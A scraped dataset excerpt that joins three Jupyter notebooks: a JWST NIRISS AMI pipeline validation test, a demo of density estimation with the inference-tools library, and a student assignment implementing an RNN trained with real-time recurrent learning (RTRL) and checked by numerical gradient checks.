"<a id=\"tempdir\"></a>\n# Set up Temporary Directory\n\n\n[Top of Page](#title_ID)",
"_____no_output_____"
]
],
[
[
"use_tempdir = True\n\n# Create a temporary directory to hold notebook output, and change the working directory to that directory.\nfrom tempfile import TemporaryDirectory\nimport os\nimport shutil\n\nif use_tempdir:\n data_dir = TemporaryDirectory()\n\n # Save original directory\n orig_dir = os.getcwd()\n\n # Move to new directory\n odir = data_dir.name\n os.chdir(data_dir.name)\n\n# For info, print out where the script is running\nprint(\"Running in {}\".format(os.getcwd()))",
"_____no_output_____"
],
[
"import os\nif 'CRDS_CACHE_TYPE' in os.environ:\n if os.environ['CRDS_CACHE_TYPE'] == 'local':\n os.environ['CRDS_PATH'] = os.path.join(os.environ['HOME'], 'crds', 'cache')\n elif os.path.isdir(os.environ['CRDS_CACHE_TYPE']):\n os.environ['CRDS_PATH'] = os.environ['CRDS_CACHE_TYPE']\nprint('CRDS cache location: {}'.format(os.environ['CRDS_PATH']))",
"_____no_output_____"
]
],
[
[
"<a id=\"imports\"></a>\n# Imports\nList the package imports and why they are relevant to this notebook.\n\n* astropy.io for opening fits files\n* numpy for working with arrays\n* IPython.display for printing markdown output\n* jwst.datamodels for building model for JWST Pipeline\n* jwst.pipeline.collect_pipeline_cfgs for gathering configuration files\n* jwst.pipeline for initiating various pipeline stages\n* jwst.ami to call the AMI Analyze step\n* jwst.associations for using association files\n* from ci_watson.artifactory_helpers import get_bigdata for reading data from Artifactory\n\n\n[Top of Page](#title_ID)",
"_____no_output_____"
]
],
[
[
"from astropy.io import fits\nimport numpy as np\nfrom IPython.display import Markdown\nfrom jwst.datamodels import ImageModel\nimport jwst.datamodels as datamodels\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.pipeline import Detector1Pipeline, Image2Pipeline, Image3Pipeline, Ami3Pipeline \nfrom jwst.ami import AmiAnalyzeStep \nfrom jwst.associations import asn_from_list\nfrom jwst.associations.lib.rules_level3_base import DMS_Level3_Base\n\nfrom ci_watson.artifactory_helpers import get_bigdata",
"_____no_output_____"
]
],
[
[
"<a id=\"data_load\"></a>\n# Loading the Data\n[Top of Page](#title_ID)",
"_____no_output_____"
]
],
[
[
"# Data files that will be imported by Artifactory:\ndatafiles = np.array(['jw01093001001_01101_00005_nis_uncal.fits',\n 'jw01093001001_01101_00006_nis_uncal.fits',\n 'jw01093001001_01101_00007_nis_uncal.fits',\n 'jw01093001001_01101_00008_nis_uncal.fits',\n 'jw01093002001_01101_00005_nis_uncal.fits',\n 'jw01093002001_01101_00006_nis_uncal.fits',\n 'jw01093002001_01101_00007_nis_uncal.fits',\n 'jw01093002001_01101_00008_nis_uncal.fits'])\n\n# Read in reference files needed for this analysis (these don't have bad pixels, like simulations)\nsuperbiasfile = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n 'jwst_niriss_superbias_sim.fits')\ndarkfile = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n 'jwst_niriss_dark_sub80_sim.fits')\nflatfile = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze', \n 'jwst_niriss_flat_general.fits')\n\n# Read in configuration files\nami_analyze_cfg = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n 'ami_analyze.cfg')\nami_normalize_cfg = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n 'ami_normalize.cfg')\nami_average_cfg = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n 'ami_average.cfg')\ncalwebb_ami3_cfg = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n 'calwebb_ami3.cfg')",
"_____no_output_____"
]
],
[
[
"<a id=\"pipeline\"></a>\n# Run the Pipeline\n\nSince this notebook tests whether the pipeline runs on all the datasets, we will run each stage of the pipeline in separate cells. That way, if a step fails, it will be easier to track down at what stage and step this error occurred.\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
"## Run Detector1 stage of the pipeline to calibrate \\*\\_uncal.fits file",
"_____no_output_____"
]
],
[
[
"for file in datafiles:\n\n df = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n file)\n \n # Modify a keyword in each data file: only necessary for now\n # Next three lines are temporary to accommodate recent changes to Mirage and pipeline\n # and for Mirage to work with the pipeline.\n with datamodels.open(df) as model:\n model.meta.dither.dither_points = int(model.meta.dither.dither_points)\n model.save(df)\n\n # Run Detector1 stage of pipeline, specifying superbias and dark reference files\n result1 = Detector1Pipeline()\n result1.superbias.override_superbias = superbiasfile\n result1.dark_current.override_dark = darkfile\n result1.ipc.skip = True\n result1.save_results = True\n result1.output_dir = odir\n result1.run(df)",
"_____no_output_____"
]
],
[
[
"## Run Image2 stage of the pipeline to calibrate \\*\\_rate.fits file",
"_____no_output_____"
]
],
[
[
"for df in datafiles:\n\n # Run Image2 stage of the pipeline on the file created above to create rate file,\n # specifying flat field file\n df_rate = os.path.join(odir, os.path.basename(df.replace('uncal','rate')))\n result2 = Image2Pipeline() \n result2.flat_field.override_flat = flatfile\n result2.photom.skip = True\n result2.resample.skip = True\n result2.save_results = True\n result2.output_dir = odir\n result2.run(df_rate)",
"_____no_output_____"
]
],
[
[
"## Run Image2 stage of the pipeline to calibrate \\*\\_rateints.fits file",
"_____no_output_____"
]
],
[
[
"for df in datafiles:\n\n # Run Image stage of the pipeline to create rateints file, specifying flat field file\n df_rateints = os.path.join(odir,os.path.basename(df.replace('uncal','rateints')))\n result3 = Image2Pipeline()\n result3.flat_field.override_flat = flatfile\n result3.photom.skip = True\n result3.resample.skip = True\n result3.save_results = True\n result3.output_dir = odir\n result3.run(df_rateints) ",
"_____no_output_____"
]
],
[
[
"## Run AmiAnalyze step on the \\*\\_cal.fits files created above",
"_____no_output_____"
]
],
[
[
"for df in datafiles:\n\n # Set up name of calibrated file\n df_cal = os.path.join(odir,os.path.basename(df.replace('uncal','cal')))\n \n # Run AMI Analyze Step of the pipeline\n result5 = AmiAnalyzeStep.call(df_cal, config_file = ami_analyze_cfg,\n output_dir = odir, save_results = True)",
"_____no_output_____"
]
],
[
[
"## Run AmiAnalyze on various target/calibrator pairs\n\nCreate association files to test calibration of target at different dither positions. Run AmiAnalyze on these association files. \n\nNote: the `program` and `targ_name` fields in the association files are the same for all pairs, so I have them set as default values in the `create_asn` routine.",
"_____no_output_____"
],
[
"Routine for creating association files (in \\*.json format)",
"_____no_output_____"
]
],
[
[
"def create_asn(outdir, targ1, psf1, prod_name, out_file, asn_id, \n program=\"1093_2_targets_f480m_2022.25coords_pipetesting\", \n targ_name='t001',\n targ2=None, psf2=None):\n \n # Create association file:\n asn = asn_from_list.asn_from_list([os.path.join(outdir,targ1)],\n product_name = prod_name,\n output_file = os.path.join(outdir,out_file),\n output_dir = outdir,rule = DMS_Level3_Base)\n \n asn['products'][0]['members'].append({'expname': os.path.join(odir,psf1),\n 'exptype': 'psf'})\n \n # check whether 2nd set of target/calibrator pairs was inputted\n if targ2 is not None: \n asn['products'][0]['members'].append({'expname':os.path.join(odir,targ2), \n 'exptype': 'science'})\n asn['products'][0]['members'].append({'expname':os.path.join(odir,psf2), \n 'exptype': 'psf'})\n\n\n\n asn['asn_type'] = 'ami3'\n asn['asn_id'] = asn_id\n asn['program'] = program\n asn['target'] = targ_name\n \n with open(os.path.join(outdir,out_file), 'w') as fp:\n fp.write(asn.dump()[1])\n fp.close()",
"_____no_output_____"
]
],
[
[
"### Create association files and run AmiAnalyze on these pairs",
"_____no_output_____"
],
[
"Association file 1 to calibrate average of targets at dithers 2 and 3 with the average of calibrators at dithers 2 and 3. ",
"_____no_output_____"
]
],
[
[
"asn1_file = \"ami_asn001_targets23_cals23.json\"\n\ntarg1 = \"jw01093001001_01101_00006_nis_cal.fits\"\npsf1 = \"jw01093002001_01101_00006_nis_cal.fits\"\nprod_name = \"jw01093001001_01101\"\nasn_id = '001'\n\n# Add second target/calibrator pair at this dither step\ntarg2 = \"jw01093001001_01101_00007_nis_cal.fits\"\npsf2 = \"jw01093002001_01101_00007_nis_cal.fits\"\n\ncreate_asn(odir, targ1, psf1, prod_name, asn1_file, asn_id, targ2=targ2, psf2=psf2)\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn1_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
"Association file 2 to calibrate target at POS1 with calibrator at POS1",
"_____no_output_____"
]
],
[
[
"# Create association file:\nasn2_file = \"ami_asn002_calibrate_targ1_cal1.json\"\n\ntarg1 = \"jw01093001001_01101_00005_nis_cal.fits\"\npsf1 = 'jw01093002001_01101_00005_nis_cal.fits'\nprod_name = \"jw01093001001_01101_00005cal00005\"\nasn_id = '002'\n\ncreate_asn(odir, targ1, psf1,prod_name, asn2_file, asn_id)\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn2_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
"Association file 3 to calibrate target at POS2 with calibrator at POS2",
"_____no_output_____"
]
],
[
[
"# Create association file:\nasn3_file = \"ami_asn003_calibrate_targ2_cal2.json\"\n\ntarg1 = \"jw01093001001_01101_00006_nis_cal.fits\"\npsf1 = \"jw01093002001_01101_00006_nis_cal.fits\"\nprod_name = \"jw01093001001_01101_00006cal00006\"\nasn_id = '003'\n\ncreate_asn(odir, targ1, psf1, prod_name, asn3_file, asn_id)\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
"Association file 4 to calibrate target at POS3 with calibrator at POS3",
"_____no_output_____"
]
],
[
[
"# Create association file:\nasn4_file = \"ami_asn004_calibrate_targ3_cal3.json\"\n\ntarg1 = \"jw01093001001_01101_00007_nis_cal.fits\"\npsf1 = \"jw01093002001_01101_00007_nis_cal.fits\"\nprod_name = \"jw01093001001_01101_00007cal00007\"\nasn_id = '004'\n\ncreate_asn(odir, targ1, psf1, prod_name, asn4_file, asn_id)\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
"Association file 5 to calibrate target at POS4 with calibrator at POS4",
"_____no_output_____"
]
],
[
[
"# Create association file:\nasn5_file = \"ami_asn005_calibrate_targ4_cal4.json\"\n\ntarg1 = \"jw01093001001_01101_00008_nis_cal.fits\"\npsf1 = \"jw01093002001_01101_00008_nis_cal.fits\"\nprod_name = \"jw01093001001_01101_00008cal00008\"\nasn_id = '005'\n\ncreate_asn(odir, targ1, psf1, prod_name, asn5_file, asn_id)\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
"Association file 6 to calibrate calibrator at POS2 with calibrator at POS3",
"_____no_output_____"
]
],
[
[
"# Create association file:\nasn6_file = \"ami_asn006_calibrate_cal2_cal3.json\"\n\ntarg1 = \"jw01093002001_01101_00006_nis_cal.fits\"\npsf1 = \"jw01093002001_01101_00007_nis_cal.fits\"\nprod_name = \"jw01093002001_01101_00006cal00007\"\nasn_id = '006'\n\ncreate_asn(odir, targ1, psf1, prod_name, asn6_file, asn_id, targ_name='t002')\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
"Association file 7 to calibrate calibrator at POS3 with calibrator at POS2",
"_____no_output_____"
]
],
[
[
"# Create association file:\nasn7_file = \"ami_asn007_calibrate_cal3_cal2.json\"\n\ntarg1 = \"jw01093002001_01101_00007_nis_cal.fits\"\npsf1 = \"jw01093002001_01101_00006_nis_cal.fits\"\nprod_name = \"jw01093002001_01101_00007cal00006\"\nasn_id = '007'\n\ncreate_asn(odir, targ1, psf1, prod_name, asn7_file, asn_id, targ_name='t002')\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
"<a id=\"testing\"></a>\n# Test Results\n\nDid the above cells run without errors? If so, **huzzah** the test passed! \n\nIf not, track down why the pipeline failed to run on these datasets.\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
"<a id=\"about_ID\"></a>\n## About this Notebook\n**Authors:** Deepashri Thatte, Senior Staff Scientist, NIRISS\n<br>Stephanie LaMassa, Scientist, NIRISS\n<br>**Updated On:** 08/04/2021",
"_____no_output_____"
],
[
"[Top of Page](#title_ID)\n<img style=\"float: right;\" src=\"./stsci_pri_combo_mark_horizonal_white_bkgd.png\" alt=\"stsci_pri_combo_mark_horizonal_white_bkgd\" width=\"200px\"/> ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
cb2d0d15f988ec89a069f3e8437fa03ec2f752dc | 113,682 | ipynb | Jupyter Notebook | demos/density_estimation_demo.ipynb | DMGREENHOUSE/inference-tools | 4b007cdcb6ae31dad6a5edf6cb50b6a9120c27e7 | [
"MIT"
] | 12 | 2019-07-05T07:46:35.000Z | 2022-02-08T12:23:06.000Z | demos/density_estimation_demo.ipynb | C-bowman/inference_tools | 7b7b8f5618a2387086fedd546996b17cffa7e30d | [
"MIT"
] | 6 | 2020-01-22T15:54:59.000Z | 2021-11-05T11:02:51.000Z | demos/density_estimation_demo.ipynb | C-bowman/inference_tools | 7b7b8f5618a2387086fedd546996b17cffa7e30d | [
"MIT"
] | 2 | 2020-03-17T15:17:39.000Z | 2022-02-10T15:31:51.000Z | 433.900763 | 46,764 | 0.94197 | [
[
[
"# Density estimation demo\n\nHere we demonstrate how to use the ``inference.pdf`` module for estimating univariate probability density functions from sample data.",
"_____no_output_____"
]
],
[
[
"from numpy import linspace, zeros, exp, log, sqrt, pi\nfrom numpy.random import normal, exponential\nfrom scipy.special import erfc\nimport matplotlib.pyplot as plt",
"_____no_output_____"
]
],
[
[
"## Kernel-density estimation\n\nGaussian kernel-density estimation is implemented via the `GaussianKDE` class:",
"_____no_output_____"
]
],
[
[
"# generate some sample data to use as a test-case\nN = 150000\nsample = zeros(N)\nsample[:N//3] = normal(size=N//3)*0.5 + 1.8\nsample[N//3:] = normal(size=2*(N//3))*0.5 + 3.5",
"_____no_output_____"
],
[
"# GaussianKDE takes an array of sample values as its only argument\nfrom inference.pdf import GaussianKDE\nPDF = GaussianKDE(sample)",
"_____no_output_____"
]
],
[
[
"Instances of density estimator classes like `GaussianKDE` can be called as functions to return the estimate of the PDF at given spatial points:",
"_____no_output_____"
]
],
[
[
"x = linspace(0, 6, 1000) # make an axis on which to evaluate the PDF estimate\np = PDF(x) # call the instance to get the estimate",
"_____no_output_____"
]
],
[
[
"We could plot the estimate manually, but for convenience the `plot_summary()` method will generate a plot automatically as well as summary statistics:",
"_____no_output_____"
]
],
[
[
"PDF.plot_summary()",
"_____no_output_____"
]
],
[
[
"The summary statistics can be accessed via properties or methods:",
"_____no_output_____"
]
],
[
[
"# the location of the mode is a property\nmode = PDF.mode\n\n# The highest-density interval for any fraction of total probability is returned by the interval() method\nhdi_95 = PDF.interval(frac = 0.95)\n\n# the mean, variance, skewness and excess kurtosis are returned by the moments() method:\nmean, variance, skewness, kurtosis = PDF.moments()",
"_____no_output_____"
]
],
[
[
"By default, `GaussianKDE` uses a simple but easy to compute estimate of the bandwidth (the standard deviation of each Gaussian kernel).\nHowever, when estimating strongly non-normal distributions, this simple approach will over-estimate required bandwidth.\n\nIn these cases, the cross-validation bandwidth selector can be used to obtain better results, but with higher computational cost.",
"_____no_output_____"
]
],
[
[
"# to demonstrate, lets create a new sample:\nN = 30000\nsample = zeros(N)\nsample[:N//3] = normal(size=N//3)\nsample[N//3:] = normal(size=2*(N//3)) + 10\n\n# now construct estimators using the simple and cross-validation estimators\npdf_simple = GaussianKDE(sample)\npdf_crossval = GaussianKDE(sample, cross_validation = True)\n\n# now build an axis on which to evaluate the estimates\nx = linspace(-4,14,500)\n\n# for comparison also compute the real distribution\nexact = (exp(-0.5*x**2)/3 + 2*exp(-0.5*(x-10)**2)/3)/sqrt(2*pi)\n\n# plot everything together\nplt.plot(x, pdf_simple(x), label = 'simple')\nplt.plot(x, pdf_crossval(x), label = 'cross-validation')\nplt.plot(x, exact, label = 'exact')\nplt.ylabel('probability density')\nplt.xlabel('x')\nplt.grid()\nplt.legend()\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Functional density estimation for unimodal PDFs\n\nIf we know that the distribution being estimated is a single (but potentially highly skewed) peak, the `UnimodalPdf` class can robustly estimate the PDF even at smaller sample sizes. It works by fitting a heavily modified Student-t distribution to the sample data.",
"_____no_output_____"
]
],
[
[
"# Create some samples from the exponentially-modified Gaussian distribution\nL = 0.3 # decay constant of the exponential distribution\nsample = normal(size = 3000) + exponential(scale = 1./L, size = 3000)\n\n# create an instance of the density estimator\nfrom inference.pdf import UnimodalPdf\nPDF = UnimodalPdf(sample)\n\n# plot the estimate along with the exact PDF for comparison\nx = linspace(-5, 15, 1000)\nexact = 0.5*L*exp(0.5*L*(L-2*x))*erfc((L-x)/sqrt(2)) # exact PDF for the exp-gaussian distribution\n\nplt.plot(x, PDF(x), label = 'UnimodalPdf estimate', lw = 3)\nplt.plot(x, exact, label = 'exact distribution', ls = 'dashed', lw = 3)\nplt.ylabel('probability density')\nplt.xlabel('x')\nplt.legend()\nplt.grid()\nplt.tight_layout()\nplt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
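An illustrative cross-check of the kernel-density idea above using scipy's gaussian_kde on the same kind of bimodal sample; this is not part of the inference-tools API, just a reference point.

```python
import numpy as np
from numpy.random import normal
from scipy.stats import gaussian_kde

N = 30000
sample = np.concatenate([normal(size=N // 3), normal(size=2 * (N // 3)) + 10])

kde = gaussian_kde(sample)          # Scott's rule bandwidth by default
x = np.linspace(-4, 14, 500)
density = kde(x)                    # estimated probability density on the axis
print(density.max(), x[density.argmax()])
```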
cb2d0de369c4753b20ff0fb35fae30ac05f29447 | 27,929 | ipynb | Jupyter Notebook | Assignment3.ipynb | rnbdsh/lstm_rnn | 5d181b382e8aa392ec949636fbe650b8fa9955c8 | [
"CC0-1.0"
] | 1 | 2020-12-07T23:22:59.000Z | 2020-12-07T23:22:59.000Z | Assignment3.ipynb | rnbdsh/lstm_rnn | 5d181b382e8aa392ec949636fbe650b8fa9955c8 | [
"CC0-1.0"
] | null | null | null | Assignment3.ipynb | rnbdsh/lstm_rnn | 5d181b382e8aa392ec949636fbe650b8fa9955c8 | [
"CC0-1.0"
] | null | null | null | 94.037037 | 14,540 | 0.786888 | [
[
[
"# Assignment 3: RTRL\n\nImplement an RNN with RTRL. The ds/dw partial derivative is 2D hidden x (self.n_hidden * self.n_input) instead of 3d.",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"class RNN(object):\n def __init__(self, n_input, n_hidden, n_output):\n # init weights and biases\n self.n_input = n_input \n self.n_hidden = n_hidden\n self.n_output = n_output\n \n self.W = np.random.normal(scale=0.1, size=(n_hidden, n_input))\n self.R = np.eye(n_hidden)\n self.V = np.random.normal(scale=0.1, size=(n_output, n_hidden))\n self.bh = np.zeros((n_hidden, 1))\n self.bo = np.zeros((n_output, 1))\n \n self.grad = {}\n self.reset()\n \n \n def reset(self):\n # init hidden activation\n self.s = np.zeros((self.n_hidden, 1))\n self.a = np.zeros((self.n_hidden, 1))\n \n # init buffers for recursive gradients\n self.ds_dW = np.zeros((self.n_hidden, self.n_hidden * self.n_input))\n self.ds_dR = np.zeros((self.n_hidden, self.n_hidden * self.n_hidden)) \n self.ds_db = np.zeros((self.n_hidden, self.n_hidden))\n \n \n def forward(self, x):\n assert x.shape[1] == self.n_input\n assert len(x.shape) == 2\n\n \"\"\"your code goes here, method must return model's prediction\"\"\"\n # partial derivative for accumulation. this is the R * f' * f that can be reused\n der = self.R * np.tile(1-self.a**2, self.n_hidden)\n \n # accumulate gradients\n self.ds_dW = der @ self.ds_dW + np.kron(np.eye(self.n_hidden), x)\n self.ds_dR = der @ self.ds_dR + np.kron(np.eye(self.n_hidden), self.a.T)\n self.ds_db = der @ self.ds_db + np.eye(self.n_hidden)\n \n # do regular 1 step forward pass\n self.s = self.W @ x.T + self.R @ self.a + self.bh\n self.a = np.tanh(self.s) # can be reused in backward pass\n return (self.V @ self.a + self.bo).T\n \n \n def backward(self, y_hat, y):\n assert y_hat.shape[1] == self.n_output\n assert len(y_hat.shape) == 2\n assert y_hat.shape == y.shape, f\"shape mismatch {y_hat.shape} {y.shape}\"\n\n e = (y_hat - y).T # error == derivative{L}/derivative{s} == dL_dy\n dL_ds = ((self.V.T @ e) * (1 - self.a**2)) # transposed to fit shape\n \n # 1:1 copy from ex1, only depend on error\n self.grad[\"bo\"] = e\n self.grad[\"V\"] = e @ self.a.T\n \n # collect new gradients\n self.grad[\"W\"] = (self.ds_dW.T @ dL_ds).reshape(self.W.shape)\n self.grad[\"R\"] = (self.ds_dR.T @ dL_ds).reshape(self.R.shape).T\n self.grad[\"bh\"]= self.ds_db.T @ dL_ds\n \n # compute loss (halved squared error)\n return np.sum(0.5 * (y - y_hat)**2)\n \n \n def fast_forward(self, x_seq):\n # this is a forward pass without gradient computation for gradient checking\n s = np.zeros_like(self.s)\n \n for x in x_seq:\n s = self.W @ x.reshape(*x.shape, 1) + self.R.T @ np.tanh(s) + self.bh\n \n return self.V @ np.tanh(s) + self.bo\n \n \n def gradient_check(self, x, y, eps=1e-5, thresh=1e-5, verbose=True):\n for name, ga in self.grad.items():\n if verbose:\n print(\"weight\\t\",name)\n \n gn = np.zeros_like(ga)\n w = self.__dict__[name]\n for idx, w_orig in np.ndenumerate(w):\n w[idx] = w_orig + eps/2\n hi = np.sum(0.5 * (y - self.fast_forward(x))**2)\n w[idx] = w_orig - eps/2\n lo = np.sum(0.5 * (y - self.fast_forward(x))**2)\n w[idx] = w_orig\n gn[idx] = (hi - lo) / eps\n dev = abs(gn[idx] - ga[idx])\n\n if verbose: # extended error\n print(f\"numeric {gn[idx]}\\tanalytic {ga[idx]}\\tdeviation {dev}\")\n\n assert dev < thresh\n\n \n def update(self, eta):\n # update weights\n for name, grad in self.grad.items():\n self.__dict__[name] -= eta * grad\n\n\ndef generate_samples(seq_length, batch_size, input_size):\n while True:\n x = np.random.uniform(low=-1, high=1, size=(seq_length, batch_size, input_size))\n y = x[0,:,:]\n yield x, y\n\n\ndef check_gradients():\n rnn = RNN(2, 5, 2)\n data = generate_samples(seq_length=10, 
batch_size=1, input_size=2)\n \n for i, (x, y) in zip(range(1), data):\n rnn.reset()\n \n for x_t in x:\n y_hat = rnn.forward(x_t)\n \n rnn.backward(y_hat, y)\n rnn.gradient_check(x, y.T)\n\ncheck_gradients()",
"weight\t bo\nnumeric 0.815833856365744\tanalytic 0.8158338563577928\tdeviation 7.951195257760446e-12\nnumeric 0.22869662842928126\tanalytic 0.2286966284260183\tdeviation 3.2629732249489507e-12\nweight\t V\nnumeric -0.06227159701777118\tanalytic -0.06227159701766642\tdeviation 1.0475648126728743e-13\nnumeric -0.20825869057050636\tanalytic -0.20825869056251206\tdeviation 7.994299666691518e-12\nnumeric 0.12911525329450946\tanalytic 0.12911525329593596\tdeviation 1.426497808765248e-12\nnumeric -0.25530579405574905\tanalytic -0.25530579405855447\tdeviation 2.805422560925308e-12\nnumeric 0.2864484471010176\tanalytic 0.2864484470922884\tdeviation 8.729184042266525e-12\nnumeric -0.01745613297798876\tanalytic -0.017456132978132165\tdeviation 1.434061203120507e-13\nnumeric -0.058379607564829065\tanalytic -0.058379607564577635\tdeviation 2.514308206080784e-13\nnumeric 0.03619391727438526\tanalytic 0.03619391727499229\tdeviation 6.070352553955161e-13\nnumeric -0.07156797167118256\tanalytic -0.07156797166948202\tdeviation 1.70054248460616e-12\nnumeric 0.08029795963704345\tanalytic 0.08029795963645936\tdeviation 5.840883332552949e-13\nweight\t W\nnumeric 0.013671606452492211\tanalytic 0.013671606447688316\tdeviation 4.803895128913105e-12\nnumeric -0.2150769000619501\tanalytic -0.21507690022036016\tdeviation 1.5841006284489367e-10\nnumeric 0.012788683234621344\tanalytic 0.012788683227092102\tdeviation 7.529241119463848e-12\nnumeric -0.19550745244956144\tanalytic -0.19550745244379822\tdeviation 5.763223231980419e-12\nnumeric 0.01524563655874722\tanalytic 0.01524563657260115\tdeviation 1.3853930155849348e-11\nnumeric -0.23855081199841696\tanalytic -0.23855081210329898\tdeviation 1.0488201973579692e-10\nnumeric 0.003959796057717568\tanalytic 0.003959796061119806\tdeviation 3.4022376929621068e-12\nnumeric -0.05378479031592497\tanalytic -0.053784790292821724\tdeviation 2.310324848098233e-11\nnumeric 0.0071864412698463545\tanalytic 0.007186441267645406\tdeviation 2.2009486247420718e-12\nnumeric -0.11281019885456266\tanalytic -0.11281019877412046\tdeviation 8.044219457215007e-11\nweight\t R\nnumeric 0.009589971200485436\tanalytic 0.009589971201813752\tdeviation 1.3283159294719127e-12\nnumeric 0.013038543761334507\tanalytic 0.013038543766773561\tdeviation 5.439053721301157e-12\nnumeric 0.011950504341662336\tanalytic 0.011950504349134677\tdeviation 7.472340454728332e-12\nnumeric 0.004855610485909878\tanalytic 0.0048556104926691405\tdeviation 6.759262420608092e-12\nnumeric 0.01419271966618396\tanalytic 0.014192719669191193\tdeviation 3.007233351226546e-12\nnumeric 0.07801721159106378\tanalytic 0.07801721159867656\tdeviation 7.612771524279083e-12\nnumeric 0.08586987589320748\tanalytic 0.08586987589683853\tdeviation 3.6310537909756135e-12\nnumeric 0.0911137997661182\tanalytic 0.091113799769927\tdeviation 3.808800497218101e-12\nnumeric 0.028039080446351502\tanalytic 0.028039080441571395\tdeviation 4.780106865887035e-12\nnumeric 0.0726571375897489\tanalytic 0.07265713758945438\tdeviation 2.945144128574384e-13\nnumeric -0.02300715705172429\tanalytic -0.023007157054816194\tdeviation 3.091905204088974e-12\nnumeric -0.03009106588902632\tanalytic -0.030091065889060246\tdeviation 3.392425229620244e-14\nnumeric -0.028308216176720077\tanalytic -0.028308216182653483\tdeviation 5.9334065438676475e-12\nnumeric -0.010972760311478423\tanalytic -0.010972760313402797\tdeviation 1.9243738547114475e-12\nnumeric -0.031528526617252695\tanalytic -0.03152852661157944\tdeviation 5.673253533622358e-12\nnumeric 0.09926859354525418\tanalytic 
0.09926859355098165\tdeviation 5.727474050587489e-12\nnumeric 0.10953253145595808\tanalytic 0.10953253145833919\tdeviation 2.381109198701381e-12\nnumeric 0.11600647071841051\tanalytic 0.11600647072619824\tdeviation 7.7877287951722e-12\nnumeric 0.03582540114011046\tanalytic 0.0358254011363949\tdeviation 3.715555640937396e-12\nnumeric 0.09302325829074752\tanalytic 0.09302325829246641\tdeviation 1.7188889200880908e-12\nnumeric -0.1304381055611259\tanalytic -0.1304381055666787\tdeviation 5.552808213238336e-12\nnumeric -0.14082622639688402\tanalytic -0.14082622640597564\tdeviation 9.091616348655407e-12\nnumeric -0.15150442748135262\tanalytic -0.15150442748633935\tdeviation 4.986733248557584e-12\nnumeric -0.045318446678654915\tanalytic -0.04531844668493795\tdeviation 6.283036591003821e-12\nnumeric -0.11566567904019996\tanalytic -0.1156656790551112\tdeviation 1.4911238910286784e-11\nweight\t bh\nnumeric -0.5444968232459768\tanalytic -0.5444968245508781\tdeviation 1.3049012981269925e-09\nnumeric -0.5475656563336262\tanalytic -0.5475656564032372\tdeviation 6.961098364399732e-11\nnumeric -0.6200465527239629\tanalytic -0.6200465535728825\tdeviation 8.489196012817501e-10\nnumeric -0.16670293899179178\tanalytic -0.16670293883403334\tdeviation 1.5775844519616555e-10\nnumeric -0.396927724388707\tanalytic -0.3969277236846757\tdeviation 7.040312777206736e-10\n"
]
],
[
[
"# Train gradient and plot weights",
"_____no_output_____"
]
],
[
[
